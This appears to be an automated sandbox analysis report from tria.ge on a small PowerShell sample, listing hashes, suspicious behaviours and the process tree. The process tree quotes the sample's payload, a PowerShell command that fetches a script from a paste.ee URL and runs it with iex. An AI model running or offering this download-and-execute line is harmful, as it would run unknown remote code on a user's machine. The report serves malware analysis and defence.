Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09/03/2025, 02:08
Static task
static1
Behavioral task
behavioral1
Sample
30d852a6064a9f9e57981364edbee0c7a1fecc1d9681bb2a9255e3b13da0c67f.ps1
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
30d852a6064a9f9e57981364edbee0c7a1fecc1d9681bb2a9255e3b13da0c67f.ps1
Resource
win10v2004-20250217-en
General
-
Target
30d852a6064a9f9e57981364edbee0c7a1fecc1d9681bb2a9255e3b13da0c67f.ps1
-
Size
50B
-
MD5
f7907aaa36ecbdf6ea474650bea2b747
-
SHA1
11356251ecc1dca11f6e372197d4d757dd6eb43d
-
SHA256
30d852a6064a9f9e57981364edbee0c7a1fecc1d9681bb2a9255e3b13da0c67f
-
SHA512
8c61c47b5d20e41147bbe3c737cf033bf00392e6dd69f8fab6dca4f54170378fef7233dccf7d8c1eabc322240e920168ed9920af0a3a83a1d13d212eff82b25e
Malware Config
Signatures
-
pid Process 2776 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2776 powershell.exe 2668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 2668 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2776 wrote to memory of 2668 2776 powershell.exe 31 PID 2776 wrote to memory of 2668 2776 powershell.exe 31 PID 2776 wrote to memory of 2668 2776 powershell.exe 31
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\30d852a6064a9f9e57981364edbee0c7a1fecc1d9681bb2a9255e3b13da0c67f.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "irm https://paste.ee/d/linhgh7d | iex"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2668
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5c4918e8116fcc8eefb30cf03e1e2ef66
SHA1e55a9d012c7cdc0c34d64697b64557c0b3152811
SHA25668a17ede0fced3e188ffe9331c7839207d66024594a84291c49443a560636144
SHA51267a1eae7ef8a4a194338112d523d23d4517a0808e1bb520badc6bb681b3e6736ca0d38fc9854bb8d8034d10cf414a0312cf66846230f23b6fc865a199eb43207